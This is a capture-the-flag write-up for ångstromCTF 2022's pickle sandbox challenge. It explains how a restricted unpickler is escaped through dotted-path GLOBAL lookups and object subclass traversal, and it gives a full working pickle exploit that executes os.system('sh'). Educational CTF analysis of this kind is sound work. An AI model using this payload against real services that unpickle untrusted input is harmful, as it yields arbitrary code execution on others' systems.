Kevin Higgs

ångstromCTF 2022 (210 points)

Now that kmh is gone, clam’s been going through pickle withdrawal. To help him cope, he wrote his own pickle pyjail. It’s nothing like kmh’s, but maybe it’s enough.

Language jails are rapidly becoming one of my CTF areas of expertise. Not sure how I feel about that.

pickle is a Python object serialization format. As the docs page loudly proclaims, it is not secure. Roughly the simplest possible code to pop a shell (adapted from David Hamann, who constructs a more realistic RCE) looks like:

At a high level, the pickle format is a stack-based mini-language. It’s not much of a language in and of itself — it has no control flow whatsoever and just executes opcodes from start to end. (Each opcode is one byte and is followed by zero or more arguments, whose format depends on the opcode. Each argument is either a fixed number of bytes or an arbitrary number of bytes up to the next newline.) But, crucially, the pickle language has opcodes GLOBAL, which can look up any global, and REDUCE, which can call any callable Python object. Using these two opcodes, you can call just about any Python built-in function with any conceivable argument — for example, os.system with a command to pop a shell. This is why pickle is completely insecure by default.

However, the behavior of opcode GLOBAL above is determined by Unpickler.find_class, which can be overridden to restrict unpickling. DiceCTF 2022 actually had a pickle challenge with the most restricted unpickler imaginable:

I never got around to writing that challenge up (maybe one day…), but I believe it was not intended to allow or require arbitrary code execution.

Well, in this challenge, find_class is still pretty restricted. We are only allowed to access properties of the empty module, and if we copy the bit of code that creates empty into a REPL to investigate, it doesn’t seem like there are that many:

But this is misleading; empty has a few properties that every Python object does by dint of inheritance, which are the same properties we use in the standard jailbreaks for eval(..., {"__builtins__": {}}). For example:

To have a target to aim for, I’ll just grab the headlining quote in Finding Python3 built-ins:

If we get that far, we’re home free — we can grab exec or eval, or __import__ the os module, or pull off many other kinds of mischief.

Now, the filtered list comprehension is probably out of our reach to express in pickle code, so we’ll just try to get our pickle to do the following (135 is the index of Sized on the server’s list of __subclasses__, which I found by looking locally and then just trying nearby numbers against the server):

empty.__class__.__base__.__subclasses__()[135].__len__.__globals__['__builtins__']

This is still a little trickier than it sounds. Some resources like “Can I safely unpickle untrusted data?” makes it sound like we can grab attributes willy-nilly, but getattr is not actually something we have available as a native pickle opcode (without literally grabbing the getattr function from GLOBAL, which is blocked by the overridden find_class). Instead, pickle just has opcodes for setattr and setitem. From the design standpoint of pickle, this makes sense since opcodes are meant to help you construct data, not access it; you shouldn’t need to get attributes of the data you constructed since you probably also put it there. But it makes our job a little more annoying.

The key insight that allows us to get over this hurdle is that the GLOBAL opcode uses getattr internally. What’s more, in pickle protocol 4, GLOBAL supports dotted paths (which is why the challenge checks name.count(".")): calling GLOBAL with foo and "bar.baz" as arguments will get you foo.bar.baz. The challenge tries to limit us to one level of getattr with the check that name.count(".") <= 1, but because we can use the SETITEM opcode to set items onto empty.__dict__, we can stash intermediate results into empty and then go through empty to access their attributes with a dotted path. That is, given some value foo that we want to get the bar attribute of, we could write pickle opcodes that roughly do the following:

(I got stuck getting this to work for a while because I didn’t realize that this requires protocol version 4+, and that that’s still something you need to express in the pickle code. The documentation didn’t help — the pickletools source code mentions in one comment, “However, a pickle does not contain its version number embedded within it.” Eventually I figured this out by manually pickling something on a dotted path and disassembling the pickle.)

To put the full exploit, we just need to look up the opcodes we need and concatenate them together with the desired arguments. Each opcode is available as a constant from the pickle module, so we can write pretty literate code. The opcodes we use below are:

  • PROTO, which takes a byte as an argument and indicates that the pickle has that protocol version
  • GLOBAL, which takes two newline-delimited strings
  • UNICODE, which takes a newline-delimited string and pushes it onto the stack
  • SETITEM, which pops c, b, a from the stack, sets a[b] = c, and pushes a back
  • EMPTY_TUPLE, which pushes a length-0 tuple
  • REDUCE, which pops a tuple of arguments and a function from the stack, calls the function with the arguments, and pushes the result back onto the stack
  • BININT1, which takes a byte as an argument and pushes it as an integer
  • TUPLE1, which constructs a length-1 tuple from the top of the stack
  • POP, which pops an element off the stack and discards it (not really necessary)
  • STOP, which concludes the program (not really necessary)

Here’s my full exploit:

import pickle
body = (
    # Set the protocol version so that dotted paths are allowed
    pickle.PROTO + b'\x04' +

    # Push empty.__dict__. This will stay on the stack until the end.
    # We will call SETITEM on it.
    pickle.GLOBAL + b'empty\n__dict__\n' +

    # empty.a = empty.__class__.__base__ = object
    pickle.UNICODE + b'a\n' +
    pickle.GLOBAL + b'empty\n__class__.__base__\n' +
    pickle.SETITEM +

    # empty.b = empty.a.__subclasses__() = object.__subclasses__()
    pickle.UNICODE + b'b\n' +
    pickle.GLOBAL + b'empty\na.__subclasses__\n' +
    pickle.EMPTY_TUPLE +
    pickle.REDUCE +
    pickle.SETITEM +

    # empty.c = empty.b[135] = Sized
    pickle.UNICODE + b'c\n' +
    pickle.GLOBAL + b'empty\nb.__getitem__\n' +
    # 135 was the value that worked against the remote server, but is not by
    # any means constant between Python versions. I ran the snippet earlier to
    # get the value on my versions of Python and then tweaked it in this
    # exploit until it worked. Wrong values will just say "Cannot get
    # attribute".
    pickle.BININT1 + bytes([135]) +
    pickle.TUPLE1 +
    pickle.REDUCE +
    pickle.SETITEM +

    # empty.d = empty.c.__len__
    pickle.UNICODE + b'd\n' +
    pickle.GLOBAL + b'empty\nc.__len__\n' +
    pickle.SETITEM +

    # empty.e = empty.d.__globals__
    pickle.UNICODE + b'e\n' +
    pickle.GLOBAL + b'empty\nd.__globals__\n' +
    pickle.SETITEM +

    # empty.f = empty.e.__getitem__("__builtins__") = empty.e["__builtins__"]
    pickle.UNICODE + b'f\n' +
    pickle.GLOBAL + b'empty\ne.__getitem__\n' +
    pickle.UNICODE + b'__builtins__\n' +
    pickle.TUPLE1 +
    pickle.REDUCE +
    pickle.SETITEM +

    # we're ready for the finale; pop empty.__dict__
    # (not that we really need to)
    pickle.POP +

    # pop a shell:
    # empty.f.__getitem__("exec")('__import__("os").system("sh")')
    pickle.GLOBAL + b'empty\nf.__getitem__\n' +
    pickle.UNICODE + b'exec\n' +
    pickle.TUPLE1 +
    pickle.REDUCE +
    pickle.UNICODE + b'__import__("os").system("sh")\n' +
    pickle.TUPLE1 +
    pickle.REDUCE +

    # we don't really need this either
    pickle.STOP
)
# pickle.loads(body)
# pickletools.dis(body)
print(body.hex())

The hexed exploit is:

The bytestring is:

Once we pop a shell, we can cd / and cat flag.txt and we’re done!

actf{__i_miss_kmh11_pyjails__}

if you liked this post, click to make an invisible number go up: